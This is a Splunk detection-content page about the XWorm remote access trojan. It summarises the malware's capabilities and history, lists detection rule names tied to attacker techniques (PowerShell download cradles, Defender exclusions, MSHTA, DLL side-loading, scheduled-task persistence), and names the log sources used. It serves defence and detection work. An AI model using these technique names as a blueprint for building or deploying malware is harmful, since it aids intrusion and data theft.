Analytics Story: XWorm

Date: 2025-05-06 ID: aa6ce371-0cfa-4984-81d6-553e8cc2b709 Author: Teoderick Contreras, Splunk Product: Splunk Enterprise Security

Description

Leverage searches that allow you to detect and investigate unusual activities that might relate to the presence of the XWorm remote access trojan (RAT). XWorm is a sophisticated and stealthy malware variant often used in data theft operations. Its capabilities include keylogging, screen capturing, remote desktop control, and data exfiltration, all of which can operate undetected. By utilizing advanced search queries and behavioral analytics, you can uncover anomalies such as unauthorized remote connections, unusual process behavior, or unexpected outbound traffic patterns. These indicators often signal the early stages of compromise, enabling rapid response before significant damage occurs. Implementing detection rules and correlating threat intelligence with system logs further enhances your ability to pinpoint XWorm activity.

Why it matters

XWorm emerged on the cybercrime scene around 2022 as a commercial Remote Access Trojan (RAT) advertised on underground forums. Originally marketed as a cheap but effective alternative to more established RATs, it quickly gained popularity due to its rich feature set, modular design, and ease of use. Over time, the developers behind XWorm have continuously updated the malware to bypass detection and expand its capabilities, making it a favorite among low- to mid-tier threat actors and ransomware affiliates. XWorm is capable of full remote desktop access, keylogging, clipboard monitoring, webcam hijacking, file theft, and command execution. It also includes features for persistence, anti-analysis, and sandbox evasion. Often delivered through phishing emails or maldocs, it can be used both for espionage and as a precursor to ransomware deployment. Its adaptability and low cost have ensured its continued presence in the threat landscape.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
Add or Set Windows Defender Exclusion Disable or Modify Tools TTP
Any Powershell DownloadFile PowerShell, Ingress Tool Transfer TTP
Any Powershell DownloadString PowerShell, Ingress Tool Transfer TTP
Detect mshta inline hta execution Mshta TTP
Detect MSHTA Url in Command Line Mshta TTP
Malicious PowerShell Process - Execution Policy Bypass PowerShell Anomaly
PowerShell 4104 Hunting PowerShell Hunting
Powershell Fileless Script Contains Base64 Encoded Content Obfuscated Files or Information, PowerShell TTP
Powershell Processing Stream Of Data PowerShell TTP
Recon AVProduct Through Pwh or WMI Gather Victim Host Information TTP
Registry Keys Used For Persistence Registry Run Keys / Startup Folder TTP
Scheduled Task Deleted Or Created via CMD Scheduled Task TTP
Suspicious Scheduled Task from Public Directory Scheduled Task Anomaly
Windows Boot or Logon Autostart Execution In Startup Folder Registry Run Keys / Startup Folder Anomaly
Windows Defender Exclusion Registry Entry Disable or Modify Tools TTP
Windows Hijack Execution Flow Version Dll Side Load DLL Anomaly
Windows MSHTA Writing to World Writable Path Mshta TTP
Windows Powershell Cryptography Namespace PowerShell Anomaly
Windows Process Execution From ProgramData Match Legitimate Resource Name or Location Anomaly
Windows Process Execution in Temp Dir Create or Modify System Process, Match Legitimate Resource Name or Location Anomaly
Windows Renamed Powershell Execution Rename Legitimate Utilities TTP
Windows Scheduled Task with Highest Privileges Scheduled Task TTP
Windows Suspicious Process File Path Create or Modify System Process, Match Legitimate Resource Name or Location TTP
Windows System LogOff Commandline System Shutdown/Reboot Anomaly
Windows System Reboot CommandLine System Shutdown/Reboot Anomaly
Windows System Shutdown CommandLine System Shutdown/Reboot Anomaly
Windows Unsigned DLL Side-Loading In Same Process Path DLL TTP
Windows Unsigned MS DLL Side-Loading DLL, Boot or Logon Autostart Execution Anomaly
Windows User Execution Malicious URL Shortcut File Malicious File Anomaly
WinEvent Scheduled Task Created Within Public Path Scheduled Task TTP
Wscript Or Cscript Suspicious Child Process Process Injection, Parent PID Spoofing, Create or Modify System Process TTP

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
CrowdStrike ProcessRollup2 N/A crowdstrike:events:sensor crowdstrike
Powershell Script Block Logging 4104 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 7 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 Windows icon Windows xmlwineventlog XmlWinEventLog:Security
Windows Event Log Security 4698 Windows icon Windows xmlwineventlog XmlWinEventLog:Security

References

Source: GitHub | Version: 1